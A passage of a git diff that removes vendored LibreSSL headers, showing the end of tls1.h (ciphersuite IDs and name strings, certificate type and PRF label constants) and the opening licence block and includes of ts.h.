-#define TLS1_CK_DH_RSA_WITH_AES_256_SHA256		0x03000069
-#define TLS1_CK_DHE_DSS_WITH_AES_256_SHA256		0x0300006A
-#define TLS1_CK_DHE_RSA_WITH_AES_256_SHA256		0x0300006B
-#define TLS1_CK_ADH_WITH_AES_128_SHA256			0x0300006C
-#define TLS1_CK_ADH_WITH_AES_256_SHA256			0x0300006D
-
-/* Camellia ciphersuites from RFC 4132. */
-#define TLS1_CK_RSA_WITH_CAMELLIA_256_CBC_SHA		0x03000084
-#define TLS1_CK_DH_DSS_WITH_CAMELLIA_256_CBC_SHA	0x03000085
-#define TLS1_CK_DH_RSA_WITH_CAMELLIA_256_CBC_SHA	0x03000086
-#define TLS1_CK_DHE_DSS_WITH_CAMELLIA_256_CBC_SHA	0x03000087
-#define TLS1_CK_DHE_RSA_WITH_CAMELLIA_256_CBC_SHA	0x03000088
-#define TLS1_CK_ADH_WITH_CAMELLIA_256_CBC_SHA		0x03000089
-
-/* SEED ciphersuites from RFC 4162. */
-#define TLS1_CK_RSA_WITH_SEED_SHA                       0x03000096
-#define TLS1_CK_DH_DSS_WITH_SEED_SHA                    0x03000097
-#define TLS1_CK_DH_RSA_WITH_SEED_SHA                    0x03000098
-#define TLS1_CK_DHE_DSS_WITH_SEED_SHA                   0x03000099
-#define TLS1_CK_DHE_RSA_WITH_SEED_SHA                   0x0300009A
-#define TLS1_CK_ADH_WITH_SEED_SHA                	0x0300009B
-
-/* TLS v1.2 GCM ciphersuites from RFC 5288. */
-#define TLS1_CK_RSA_WITH_AES_128_GCM_SHA256		0x0300009C
-#define TLS1_CK_RSA_WITH_AES_256_GCM_SHA384		0x0300009D
-#define TLS1_CK_DHE_RSA_WITH_AES_128_GCM_SHA256		0x0300009E
-#define TLS1_CK_DHE_RSA_WITH_AES_256_GCM_SHA384		0x0300009F
-#define TLS1_CK_DH_RSA_WITH_AES_128_GCM_SHA256		0x030000A0
-#define TLS1_CK_DH_RSA_WITH_AES_256_GCM_SHA384		0x030000A1
-#define TLS1_CK_DHE_DSS_WITH_AES_128_GCM_SHA256		0x030000A2
-#define TLS1_CK_DHE_DSS_WITH_AES_256_GCM_SHA384		0x030000A3
-#define TLS1_CK_DH_DSS_WITH_AES_128_GCM_SHA256		0x030000A4
-#define TLS1_CK_DH_DSS_WITH_AES_256_GCM_SHA384		0x030000A5
-#define TLS1_CK_ADH_WITH_AES_128_GCM_SHA256		0x030000A6
-#define TLS1_CK_ADH_WITH_AES_256_GCM_SHA384		0x030000A7
-
-/* TLS 1.2 Camellia SHA-256 ciphersuites from RFC5932 */
-#define TLS1_CK_RSA_WITH_CAMELLIA_128_CBC_SHA256	0x030000BA
-#define TLS1_CK_DH_DSS_WITH_CAMELLIA_128_CBC_SHA256	0x030000BB
-#define TLS1_CK_DH_RSA_WITH_CAMELLIA_128_CBC_SHA256	0x030000BC
-#define TLS1_CK_DHE_DSS_WITH_CAMELLIA_128_CBC_SHA256	0x030000BD
-#define TLS1_CK_DHE_RSA_WITH_CAMELLIA_128_CBC_SHA256	0x030000BE
-#define TLS1_CK_ADH_WITH_CAMELLIA_128_CBC_SHA256	0x030000BF
-
-#define TLS1_CK_RSA_WITH_CAMELLIA_256_CBC_SHA256	0x030000C0
-#define TLS1_CK_DH_DSS_WITH_CAMELLIA_256_CBC_SHA256	0x030000C1
-#define TLS1_CK_DH_RSA_WITH_CAMELLIA_256_CBC_SHA256	0x030000C2
-#define TLS1_CK_DHE_DSS_WITH_CAMELLIA_256_CBC_SHA256	0x030000C3
-#define TLS1_CK_DHE_RSA_WITH_CAMELLIA_256_CBC_SHA256	0x030000C4
-#define TLS1_CK_ADH_WITH_CAMELLIA_256_CBC_SHA256	0x030000C5
-
-/* ECC ciphersuites from RFC 4492. */
-#define TLS1_CK_ECDH_ECDSA_WITH_NULL_SHA                0x0300C001
-#define TLS1_CK_ECDH_ECDSA_WITH_RC4_128_SHA             0x0300C002
-#define TLS1_CK_ECDH_ECDSA_WITH_DES_192_CBC3_SHA        0x0300C003
-#define TLS1_CK_ECDH_ECDSA_WITH_AES_128_CBC_SHA         0x0300C004
-#define TLS1_CK_ECDH_ECDSA_WITH_AES_256_CBC_SHA         0x0300C005
-
-#define TLS1_CK_ECDHE_ECDSA_WITH_NULL_SHA               0x0300C006
-#define TLS1_CK_ECDHE_ECDSA_WITH_RC4_128_SHA            0x0300C007
-#define TLS1_CK_ECDHE_ECDSA_WITH_DES_192_CBC3_SHA       0x0300C008
-#define TLS1_CK_ECDHE_ECDSA_WITH_AES_128_CBC_SHA        0x0300C009
-#define TLS1_CK_ECDHE_ECDSA_WITH_AES_256_CBC_SHA        0x0300C00A
-
-#define TLS1_CK_ECDH_RSA_WITH_NULL_SHA                  0x0300C00B
-#define TLS1_CK_ECDH_RSA_WITH_RC4_128_SHA               0x0300C00C
-#define TLS1_CK_ECDH_RSA_WITH_DES_192_CBC3_SHA          0x0300C00D
-#define TLS1_CK_ECDH_RSA_WITH_AES_128_CBC_SHA           0x0300C00E
-#define TLS1_CK_ECDH_RSA_WITH_AES_256_CBC_SHA           0x0300C00F
-
-#define TLS1_CK_ECDHE_RSA_WITH_NULL_SHA                 0x0300C010
-#define TLS1_CK_ECDHE_RSA_WITH_RC4_128_SHA              0x0300C011
-#define TLS1_CK_ECDHE_RSA_WITH_DES_192_CBC3_SHA         0x0300C012
-#define TLS1_CK_ECDHE_RSA_WITH_AES_128_CBC_SHA          0x0300C013
-#define TLS1_CK_ECDHE_RSA_WITH_AES_256_CBC_SHA          0x0300C014
-
-#define TLS1_CK_ECDH_anon_WITH_NULL_SHA                 0x0300C015
-#define TLS1_CK_ECDH_anon_WITH_RC4_128_SHA              0x0300C016
-#define TLS1_CK_ECDH_anon_WITH_DES_192_CBC3_SHA         0x0300C017
-#define TLS1_CK_ECDH_anon_WITH_AES_128_CBC_SHA          0x0300C018
-#define TLS1_CK_ECDH_anon_WITH_AES_256_CBC_SHA          0x0300C019
-
-/* SRP ciphersuites from RFC 5054. */
-#define TLS1_CK_SRP_SHA_WITH_3DES_EDE_CBC_SHA		0x0300C01A
-#define TLS1_CK_SRP_SHA_RSA_WITH_3DES_EDE_CBC_SHA	0x0300C01B
-#define TLS1_CK_SRP_SHA_DSS_WITH_3DES_EDE_CBC_SHA	0x0300C01C
-#define TLS1_CK_SRP_SHA_WITH_AES_128_CBC_SHA		0x0300C01D
-#define TLS1_CK_SRP_SHA_RSA_WITH_AES_128_CBC_SHA	0x0300C01E
-#define TLS1_CK_SRP_SHA_DSS_WITH_AES_128_CBC_SHA	0x0300C01F
-#define TLS1_CK_SRP_SHA_WITH_AES_256_CBC_SHA		0x0300C020
-#define TLS1_CK_SRP_SHA_RSA_WITH_AES_256_CBC_SHA	0x0300C021
-#define TLS1_CK_SRP_SHA_DSS_WITH_AES_256_CBC_SHA	0x0300C022
-
-/* ECDH HMAC based ciphersuites from RFC 5289. */
-#define TLS1_CK_ECDHE_ECDSA_WITH_AES_128_SHA256         0x0300C023
-#define TLS1_CK_ECDHE_ECDSA_WITH_AES_256_SHA384         0x0300C024
-#define TLS1_CK_ECDH_ECDSA_WITH_AES_128_SHA256          0x0300C025
-#define TLS1_CK_ECDH_ECDSA_WITH_AES_256_SHA384          0x0300C026
-#define TLS1_CK_ECDHE_RSA_WITH_AES_128_SHA256           0x0300C027
-#define TLS1_CK_ECDHE_RSA_WITH_AES_256_SHA384           0x0300C028
-#define TLS1_CK_ECDH_RSA_WITH_AES_128_SHA256            0x0300C029
-#define TLS1_CK_ECDH_RSA_WITH_AES_256_SHA384            0x0300C02A
-
-/* ECDH GCM based ciphersuites from RFC 5289. */
-#define TLS1_CK_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256	0x0300C02B
-#define TLS1_CK_ECDHE_ECDSA_WITH_AES_256_GCM_SHA384	0x0300C02C
-#define TLS1_CK_ECDH_ECDSA_WITH_AES_128_GCM_SHA256      0x0300C02D
-#define TLS1_CK_ECDH_ECDSA_WITH_AES_256_GCM_SHA384      0x0300C02E
-#define TLS1_CK_ECDHE_RSA_WITH_AES_128_GCM_SHA256       0x0300C02F
-#define TLS1_CK_ECDHE_RSA_WITH_AES_256_GCM_SHA384       0x0300C030
-#define TLS1_CK_ECDH_RSA_WITH_AES_128_GCM_SHA256        0x0300C031
-#define TLS1_CK_ECDH_RSA_WITH_AES_256_GCM_SHA384        0x0300C032
-
-/* ChaCha20-Poly1305 based ciphersuites. */
-#define TLS1_CK_ECDHE_RSA_CHACHA20_POLY1305		0x0300CCA8
-#define TLS1_CK_ECDHE_ECDSA_CHACHA20_POLY1305		0x0300CCA9
-#define TLS1_CK_DHE_RSA_CHACHA20_POLY1305		0x0300CCAA
-
-#define TLS1_TXT_RSA_EXPORT1024_WITH_RC4_56_MD5		"EXP1024-RC4-MD5"
-#define TLS1_TXT_RSA_EXPORT1024_WITH_RC2_CBC_56_MD5	"EXP1024-RC2-CBC-MD5"
-#define TLS1_TXT_RSA_EXPORT1024_WITH_DES_CBC_SHA	"EXP1024-DES-CBC-SHA"
-#define TLS1_TXT_DHE_DSS_EXPORT1024_WITH_DES_CBC_SHA	"EXP1024-DHE-DSS-DES-CBC-SHA"
-#define TLS1_TXT_RSA_EXPORT1024_WITH_RC4_56_SHA		"EXP1024-RC4-SHA"
-#define TLS1_TXT_DHE_DSS_EXPORT1024_WITH_RC4_56_SHA	"EXP1024-DHE-DSS-RC4-SHA"
-#define TLS1_TXT_DHE_DSS_WITH_RC4_128_SHA		"DHE-DSS-RC4-SHA"
-
-/* AES ciphersuites from RFC 3268. */
-#define TLS1_TXT_RSA_WITH_AES_128_SHA			"AES128-SHA"
-#define TLS1_TXT_DH_DSS_WITH_AES_128_SHA		"DH-DSS-AES128-SHA"
-#define TLS1_TXT_DH_RSA_WITH_AES_128_SHA		"DH-RSA-AES128-SHA"
-#define TLS1_TXT_DHE_DSS_WITH_AES_128_SHA		"DHE-DSS-AES128-SHA"
-#define TLS1_TXT_DHE_RSA_WITH_AES_128_SHA		"DHE-RSA-AES128-SHA"
-#define TLS1_TXT_ADH_WITH_AES_128_SHA			"ADH-AES128-SHA"
-
-#define TLS1_TXT_RSA_WITH_AES_256_SHA			"AES256-SHA"
-#define TLS1_TXT_DH_DSS_WITH_AES_256_SHA		"DH-DSS-AES256-SHA"
-#define TLS1_TXT_DH_RSA_WITH_AES_256_SHA		"DH-RSA-AES256-SHA"
-#define TLS1_TXT_DHE_DSS_WITH_AES_256_SHA		"DHE-DSS-AES256-SHA"
-#define TLS1_TXT_DHE_RSA_WITH_AES_256_SHA		"DHE-RSA-AES256-SHA"
-#define TLS1_TXT_ADH_WITH_AES_256_SHA			"ADH-AES256-SHA"
-
-/* ECC ciphersuites from draft-ietf-tls-ecc-01.txt (Mar 15, 2001) */
-#define TLS1_TXT_ECDH_ECDSA_WITH_NULL_SHA               "ECDH-ECDSA-NULL-SHA"
-#define TLS1_TXT_ECDH_ECDSA_WITH_RC4_128_SHA            "ECDH-ECDSA-RC4-SHA"
-#define TLS1_TXT_ECDH_ECDSA_WITH_DES_192_CBC3_SHA       "ECDH-ECDSA-DES-CBC3-SHA"
-#define TLS1_TXT_ECDH_ECDSA_WITH_AES_128_CBC_SHA        "ECDH-ECDSA-AES128-SHA"
-#define TLS1_TXT_ECDH_ECDSA_WITH_AES_256_CBC_SHA        "ECDH-ECDSA-AES256-SHA"
-
-#define TLS1_TXT_ECDHE_ECDSA_WITH_NULL_SHA              "ECDHE-ECDSA-NULL-SHA"
-#define TLS1_TXT_ECDHE_ECDSA_WITH_RC4_128_SHA           "ECDHE-ECDSA-RC4-SHA"
-#define TLS1_TXT_ECDHE_ECDSA_WITH_DES_192_CBC3_SHA      "ECDHE-ECDSA-DES-CBC3-SHA"
-#define TLS1_TXT_ECDHE_ECDSA_WITH_AES_128_CBC_SHA       "ECDHE-ECDSA-AES128-SHA"
-#define TLS1_TXT_ECDHE_ECDSA_WITH_AES_256_CBC_SHA       "ECDHE-ECDSA-AES256-SHA"
-
-#define TLS1_TXT_ECDH_RSA_WITH_NULL_SHA                 "ECDH-RSA-NULL-SHA"
-#define TLS1_TXT_ECDH_RSA_WITH_RC4_128_SHA              "ECDH-RSA-RC4-SHA"
-#define TLS1_TXT_ECDH_RSA_WITH_DES_192_CBC3_SHA         "ECDH-RSA-DES-CBC3-SHA"
-#define TLS1_TXT_ECDH_RSA_WITH_AES_128_CBC_SHA          "ECDH-RSA-AES128-SHA"
-#define TLS1_TXT_ECDH_RSA_WITH_AES_256_CBC_SHA          "ECDH-RSA-AES256-SHA"
-
-#define TLS1_TXT_ECDHE_RSA_WITH_NULL_SHA                "ECDHE-RSA-NULL-SHA"
-#define TLS1_TXT_ECDHE_RSA_WITH_RC4_128_SHA             "ECDHE-RSA-RC4-SHA"
-#define TLS1_TXT_ECDHE_RSA_WITH_DES_192_CBC3_SHA        "ECDHE-RSA-DES-CBC3-SHA"
-#define TLS1_TXT_ECDHE_RSA_WITH_AES_128_CBC_SHA         "ECDHE-RSA-AES128-SHA"
-#define TLS1_TXT_ECDHE_RSA_WITH_AES_256_CBC_SHA         "ECDHE-RSA-AES256-SHA"
-
-#define TLS1_TXT_ECDH_anon_WITH_NULL_SHA                "AECDH-NULL-SHA"
-#define TLS1_TXT_ECDH_anon_WITH_RC4_128_SHA             "AECDH-RC4-SHA"
-#define TLS1_TXT_ECDH_anon_WITH_DES_192_CBC3_SHA        "AECDH-DES-CBC3-SHA"
-#define TLS1_TXT_ECDH_anon_WITH_AES_128_CBC_SHA         "AECDH-AES128-SHA"
-#define TLS1_TXT_ECDH_anon_WITH_AES_256_CBC_SHA         "AECDH-AES256-SHA"
-
-/* PSK ciphersuites from RFC 4279. */
-#define TLS1_TXT_PSK_WITH_RC4_128_SHA			"PSK-RC4-SHA"
-#define TLS1_TXT_PSK_WITH_3DES_EDE_CBC_SHA		"PSK-3DES-EDE-CBC-SHA"
-#define TLS1_TXT_PSK_WITH_AES_128_CBC_SHA		"PSK-AES128-CBC-SHA"
-#define TLS1_TXT_PSK_WITH_AES_256_CBC_SHA		"PSK-AES256-CBC-SHA"
-
-/* SRP ciphersuite from RFC 5054. */
-#define TLS1_TXT_SRP_SHA_WITH_3DES_EDE_CBC_SHA		"SRP-3DES-EDE-CBC-SHA"
-#define TLS1_TXT_SRP_SHA_RSA_WITH_3DES_EDE_CBC_SHA	"SRP-RSA-3DES-EDE-CBC-SHA"
-#define TLS1_TXT_SRP_SHA_DSS_WITH_3DES_EDE_CBC_SHA	"SRP-DSS-3DES-EDE-CBC-SHA"
-#define TLS1_TXT_SRP_SHA_WITH_AES_128_CBC_SHA		"SRP-AES-128-CBC-SHA"
-#define TLS1_TXT_SRP_SHA_RSA_WITH_AES_128_CBC_SHA	"SRP-RSA-AES-128-CBC-SHA"
-#define TLS1_TXT_SRP_SHA_DSS_WITH_AES_128_CBC_SHA	"SRP-DSS-AES-128-CBC-SHA"
-#define TLS1_TXT_SRP_SHA_WITH_AES_256_CBC_SHA		"SRP-AES-256-CBC-SHA"
-#define TLS1_TXT_SRP_SHA_RSA_WITH_AES_256_CBC_SHA	"SRP-RSA-AES-256-CBC-SHA"
-#define TLS1_TXT_SRP_SHA_DSS_WITH_AES_256_CBC_SHA	"SRP-DSS-AES-256-CBC-SHA"
-
-/* Camellia ciphersuites from RFC 4132. */
-#define TLS1_TXT_RSA_WITH_CAMELLIA_128_CBC_SHA		"CAMELLIA128-SHA"
-#define TLS1_TXT_DH_DSS_WITH_CAMELLIA_128_CBC_SHA	"DH-DSS-CAMELLIA128-SHA"
-#define TLS1_TXT_DH_RSA_WITH_CAMELLIA_128_CBC_SHA	"DH-RSA-CAMELLIA128-SHA"
-#define TLS1_TXT_DHE_DSS_WITH_CAMELLIA_128_CBC_SHA	"DHE-DSS-CAMELLIA128-SHA"
-#define TLS1_TXT_DHE_RSA_WITH_CAMELLIA_128_CBC_SHA	"DHE-RSA-CAMELLIA128-SHA"
-#define TLS1_TXT_ADH_WITH_CAMELLIA_128_CBC_SHA		"ADH-CAMELLIA128-SHA"
-
-#define TLS1_TXT_RSA_WITH_CAMELLIA_256_CBC_SHA		"CAMELLIA256-SHA"
-#define TLS1_TXT_DH_DSS_WITH_CAMELLIA_256_CBC_SHA	"DH-DSS-CAMELLIA256-SHA"
-#define TLS1_TXT_DH_RSA_WITH_CAMELLIA_256_CBC_SHA	"DH-RSA-CAMELLIA256-SHA"
-#define TLS1_TXT_DHE_DSS_WITH_CAMELLIA_256_CBC_SHA	"DHE-DSS-CAMELLIA256-SHA"
-#define TLS1_TXT_DHE_RSA_WITH_CAMELLIA_256_CBC_SHA	"DHE-RSA-CAMELLIA256-SHA"
-#define TLS1_TXT_ADH_WITH_CAMELLIA_256_CBC_SHA		"ADH-CAMELLIA256-SHA"
-
-/* TLS 1.2 Camellia SHA-256 ciphersuites from RFC5932 */
-#define TLS1_TXT_RSA_WITH_CAMELLIA_128_CBC_SHA256	"CAMELLIA128-SHA256"
-#define TLS1_TXT_DH_DSS_WITH_CAMELLIA_128_CBC_SHA256	"DH-DSS-CAMELLIA128-SHA256"
-#define TLS1_TXT_DH_RSA_WITH_CAMELLIA_128_CBC_SHA256	"DH-RSA-CAMELLIA128-SHA256"
-#define TLS1_TXT_DHE_DSS_WITH_CAMELLIA_128_CBC_SHA256	"DHE-DSS-CAMELLIA128-SHA256"
-#define TLS1_TXT_DHE_RSA_WITH_CAMELLIA_128_CBC_SHA256	"DHE-RSA-CAMELLIA128-SHA256"
-#define TLS1_TXT_ADH_WITH_CAMELLIA_128_CBC_SHA256	"ADH-CAMELLIA128-SHA256"
-
-#define TLS1_TXT_RSA_WITH_CAMELLIA_256_CBC_SHA256	"CAMELLIA256-SHA256"
-#define TLS1_TXT_DH_DSS_WITH_CAMELLIA_256_CBC_SHA256	"DH-DSS-CAMELLIA256-SHA256"
-#define TLS1_TXT_DH_RSA_WITH_CAMELLIA_256_CBC_SHA256	"DH-RSA-CAMELLIA256-SHA256"
-#define TLS1_TXT_DHE_DSS_WITH_CAMELLIA_256_CBC_SHA256	"DHE-DSS-CAMELLIA256-SHA256"
-#define TLS1_TXT_DHE_RSA_WITH_CAMELLIA_256_CBC_SHA256	"DHE-RSA-CAMELLIA256-SHA256"
-#define TLS1_TXT_ADH_WITH_CAMELLIA_256_CBC_SHA256	"ADH-CAMELLIA256-SHA256"
-
-/* SEED ciphersuites from RFC 4162. */
-#define TLS1_TXT_RSA_WITH_SEED_SHA                      "SEED-SHA"
-#define TLS1_TXT_DH_DSS_WITH_SEED_SHA                   "DH-DSS-SEED-SHA"
-#define TLS1_TXT_DH_RSA_WITH_SEED_SHA                   "DH-RSA-SEED-SHA"
-#define TLS1_TXT_DHE_DSS_WITH_SEED_SHA                  "DHE-DSS-SEED-SHA"
-#define TLS1_TXT_DHE_RSA_WITH_SEED_SHA                  "DHE-RSA-SEED-SHA"
-#define TLS1_TXT_ADH_WITH_SEED_SHA                      "ADH-SEED-SHA"
-
-/* TLS v1.2 ciphersuites. */
-#define TLS1_TXT_RSA_WITH_NULL_SHA256			"NULL-SHA256"
-#define TLS1_TXT_RSA_WITH_AES_128_SHA256		"AES128-SHA256"
-#define TLS1_TXT_RSA_WITH_AES_256_SHA256		"AES256-SHA256"
-#define TLS1_TXT_DH_DSS_WITH_AES_128_SHA256		"DH-DSS-AES128-SHA256"
-#define TLS1_TXT_DH_RSA_WITH_AES_128_SHA256		"DH-RSA-AES128-SHA256"
-#define TLS1_TXT_DHE_DSS_WITH_AES_128_SHA256		"DHE-DSS-AES128-SHA256"
-#define TLS1_TXT_DHE_RSA_WITH_AES_128_SHA256		"DHE-RSA-AES128-SHA256"
-#define TLS1_TXT_DH_DSS_WITH_AES_256_SHA256		"DH-DSS-AES256-SHA256"
-#define TLS1_TXT_DH_RSA_WITH_AES_256_SHA256		"DH-RSA-AES256-SHA256"
-#define TLS1_TXT_DHE_DSS_WITH_AES_256_SHA256		"DHE-DSS-AES256-SHA256"
-#define TLS1_TXT_DHE_RSA_WITH_AES_256_SHA256		"DHE-RSA-AES256-SHA256"
-#define TLS1_TXT_ADH_WITH_AES_128_SHA256		"ADH-AES128-SHA256"
-#define TLS1_TXT_ADH_WITH_AES_256_SHA256		"ADH-AES256-SHA256"
-
-/* TLS v1.2 GCM ciphersuites from RFC 5288. */
-#define TLS1_TXT_RSA_WITH_AES_128_GCM_SHA256		"AES128-GCM-SHA256"
-#define TLS1_TXT_RSA_WITH_AES_256_GCM_SHA384		"AES256-GCM-SHA384"
-#define TLS1_TXT_DHE_RSA_WITH_AES_128_GCM_SHA256	"DHE-RSA-AES128-GCM-SHA256"
-#define TLS1_TXT_DHE_RSA_WITH_AES_256_GCM_SHA384	"DHE-RSA-AES256-GCM-SHA384"
-#define TLS1_TXT_DH_RSA_WITH_AES_128_GCM_SHA256		"DH-RSA-AES128-GCM-SHA256"
-#define TLS1_TXT_DH_RSA_WITH_AES_256_GCM_SHA384		"DH-RSA-AES256-GCM-SHA384"
-#define TLS1_TXT_DHE_DSS_WITH_AES_128_GCM_SHA256	"DHE-DSS-AES128-GCM-SHA256"
-#define TLS1_TXT_DHE_DSS_WITH_AES_256_GCM_SHA384	"DHE-DSS-AES256-GCM-SHA384"
-#define TLS1_TXT_DH_DSS_WITH_AES_128_GCM_SHA256		"DH-DSS-AES128-GCM-SHA256"
-#define TLS1_TXT_DH_DSS_WITH_AES_256_GCM_SHA384		"DH-DSS-AES256-GCM-SHA384"
-#define TLS1_TXT_ADH_WITH_AES_128_GCM_SHA256		"ADH-AES128-GCM-SHA256"
-#define TLS1_TXT_ADH_WITH_AES_256_GCM_SHA384		"ADH-AES256-GCM-SHA384"
-
-/* ECDH HMAC based ciphersuites from RFC 5289. */
-
-#define TLS1_TXT_ECDHE_ECDSA_WITH_AES_128_SHA256    "ECDHE-ECDSA-AES128-SHA256"
-#define TLS1_TXT_ECDHE_ECDSA_WITH_AES_256_SHA384    "ECDHE-ECDSA-AES256-SHA384"
-#define TLS1_TXT_ECDH_ECDSA_WITH_AES_128_SHA256     "ECDH-ECDSA-AES128-SHA256"
-#define TLS1_TXT_ECDH_ECDSA_WITH_AES_256_SHA384     "ECDH-ECDSA-AES256-SHA384"
-#define TLS1_TXT_ECDHE_RSA_WITH_AES_128_SHA256      "ECDHE-RSA-AES128-SHA256"
-#define TLS1_TXT_ECDHE_RSA_WITH_AES_256_SHA384      "ECDHE-RSA-AES256-SHA384"
-#define TLS1_TXT_ECDH_RSA_WITH_AES_128_SHA256       "ECDH-RSA-AES128-SHA256"
-#define TLS1_TXT_ECDH_RSA_WITH_AES_256_SHA384       "ECDH-RSA-AES256-SHA384"
-
-/* ECDH GCM based ciphersuites from RFC 5289. */
-#define TLS1_TXT_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256    "ECDHE-ECDSA-AES128-GCM-SHA256"
-#define TLS1_TXT_ECDHE_ECDSA_WITH_AES_256_GCM_SHA384    "ECDHE-ECDSA-AES256-GCM-SHA384"
-#define TLS1_TXT_ECDH_ECDSA_WITH_AES_128_GCM_SHA256     "ECDH-ECDSA-AES128-GCM-SHA256"
-#define TLS1_TXT_ECDH_ECDSA_WITH_AES_256_GCM_SHA384     "ECDH-ECDSA-AES256-GCM-SHA384"
-#define TLS1_TXT_ECDHE_RSA_WITH_AES_128_GCM_SHA256      "ECDHE-RSA-AES128-GCM-SHA256"
-#define TLS1_TXT_ECDHE_RSA_WITH_AES_256_GCM_SHA384      "ECDHE-RSA-AES256-GCM-SHA384"
-#define TLS1_TXT_ECDH_RSA_WITH_AES_128_GCM_SHA256       "ECDH-RSA-AES128-GCM-SHA256"
-#define TLS1_TXT_ECDH_RSA_WITH_AES_256_GCM_SHA384       "ECDH-RSA-AES256-GCM-SHA384"
-
-/* ChaCha20-Poly1305 based ciphersuites. */
-#define TLS1_TXT_ECDHE_RSA_WITH_CHACHA20_POLY1305	"ECDHE-RSA-CHACHA20-POLY1305"
-#define TLS1_TXT_ECDHE_ECDSA_WITH_CHACHA20_POLY1305	"ECDHE-ECDSA-CHACHA20-POLY1305"
-#define TLS1_TXT_DHE_RSA_WITH_CHACHA20_POLY1305		"DHE-RSA-CHACHA20-POLY1305"
-
-#define TLS_CT_RSA_SIGN			1
-#define TLS_CT_DSS_SIGN			2
-#define TLS_CT_RSA_FIXED_DH		3
-#define TLS_CT_DSS_FIXED_DH		4
-#define TLS_CT_ECDSA_SIGN		64
-#define TLS_CT_RSA_FIXED_ECDH		65
-#define TLS_CT_ECDSA_FIXED_ECDH 	66
-#define TLS_CT_GOST94_SIGN		21
-#define TLS_CT_GOST01_SIGN		22
-#define TLS_CT_GOST12_256_SIGN		238 /* FIXME: IANA */
-#define TLS_CT_GOST12_512_SIGN		239 /* FIXME: IANA */
-/* when correcting this number, correct also SSL3_CT_NUMBER in ssl3.h (see
- * comment there) */
-#define TLS_CT_NUMBER			11
-
-#define TLS1_FINISH_MAC_LENGTH		12
-
-#define TLS_MD_MAX_CONST_SIZE			20
-#define TLS_MD_CLIENT_FINISH_CONST		"client finished"
-#define TLS_MD_CLIENT_FINISH_CONST_SIZE		15
-#define TLS_MD_SERVER_FINISH_CONST		"server finished"
-#define TLS_MD_SERVER_FINISH_CONST_SIZE		15
-#define TLS_MD_SERVER_WRITE_KEY_CONST		"server write key"
-#define TLS_MD_SERVER_WRITE_KEY_CONST_SIZE	16
-#define TLS_MD_KEY_EXPANSION_CONST		"key expansion"
-#define TLS_MD_KEY_EXPANSION_CONST_SIZE		13
-#define TLS_MD_CLIENT_WRITE_KEY_CONST		"client write key"
-#define TLS_MD_CLIENT_WRITE_KEY_CONST_SIZE	16
-#define TLS_MD_SERVER_WRITE_KEY_CONST		"server write key"
-#define TLS_MD_SERVER_WRITE_KEY_CONST_SIZE	16
-#define TLS_MD_IV_BLOCK_CONST			"IV block"
-#define TLS_MD_IV_BLOCK_CONST_SIZE		8
-#define TLS_MD_MASTER_SECRET_CONST		"master secret"
-#define TLS_MD_MASTER_SECRET_CONST_SIZE		13
-
-/* TLS Session Ticket extension struct. */
-struct tls_session_ticket_ext_st {
-	unsigned short length;
-	void *data;
-};
-
-#ifdef  __cplusplus
-}
-#endif
-#endif
diff --git a/thirdparty/libressl/include/openssl/ts.h b/thirdparty/libressl/include/openssl/ts.h
deleted file mode 100644
index a8d2281..0000000
--- a/thirdparty/libressl/include/openssl/ts.h
+++ /dev/null
@@ -1,836 +0,0 @@
-/* $OpenBSD: ts.h,v 1.8 2016/12/27 16:05:57 jsing Exp $ */
-/* Written by Zoltan Glozik (zglozik@opentsa.org) for the OpenSSL
- * project 2002, 2003, 2004.
- */
-/* ====================================================================
- * Copyright (c) 2006 The OpenSSL Project.  All rights reserved.
- *
- * Redistribution and use in source and binary forms, with or without
- * modification, are permitted provided that the following conditions
- * are met:
- *
- * 1. Redistributions of source code must retain the above copyright
- *    notice, this list of conditions and the following disclaimer.
- *
- * 2. Redistributions in binary form must reproduce the above copyright
- *    notice, this list of conditions and the following disclaimer in
- *    the documentation and/or other materials provided with the
- *    distribution.
- *
- * 3. All advertising materials mentioning features or use of this
- *    software must display the following acknowledgment:
- *    "This product includes software developed by the OpenSSL Project
- *    for use in the OpenSSL Toolkit. (http://www.OpenSSL.org/)"
- *
- * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
- *    endorse or promote products derived from this software without
- *    prior written permission. For written permission, please contact
- *    licensing@OpenSSL.org.
- *
- * 5. Products derived from this software may not be called "OpenSSL"
- *    nor may "OpenSSL" appear in their names without prior written
- *    permission of the OpenSSL Project.
- *
- * 6. Redistributions of any form whatsoever must retain the following
- *    acknowledgment:
- *    "This product includes software developed by the OpenSSL Project
- *    for use in the OpenSSL Toolkit (http://www.OpenSSL.org/)"
- *
- * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
- * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
- * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
- * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
- * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
- * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
- * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
- * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
- * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
- * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
- * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
- * OF THE POSSIBILITY OF SUCH DAMAGE.
- * ====================================================================
- *
- * This product includes cryptographic software written by Eric Young
- * (eay@cryptsoft.com).  This product includes software written by Tim
- * Hudson (tjh@cryptsoft.com).
- *
- */
-
-#ifndef HEADER_TS_H
-#define HEADER_TS_H
-
-#include <openssl/opensslconf.h>
-
-#ifndef OPENSSL_NO_BUFFER
-#include <openssl/buffer.h>
-#endif
-#ifndef OPENSSL_NO_EVP
-#include <openssl/evp.h>
-#endif
-#ifndef OPENSSL_NO_BIO
-#include <openssl/bio.h>
-#endif
-#include <openssl/stack.h>
-#include <openssl/asn1.h>
-#include <openssl/safestack.h>
-
-#ifndef OPENSSL_NO_RSA
-#include <openssl/rsa.h>
-#endif
-
-#ifndef OPENSSL_NO_DSA
-#include <openssl/dsa.h>
-#endif
-
-#ifndef OPENSSL_NO_DH
-#include <openssl/dh.h>
-#endif
-
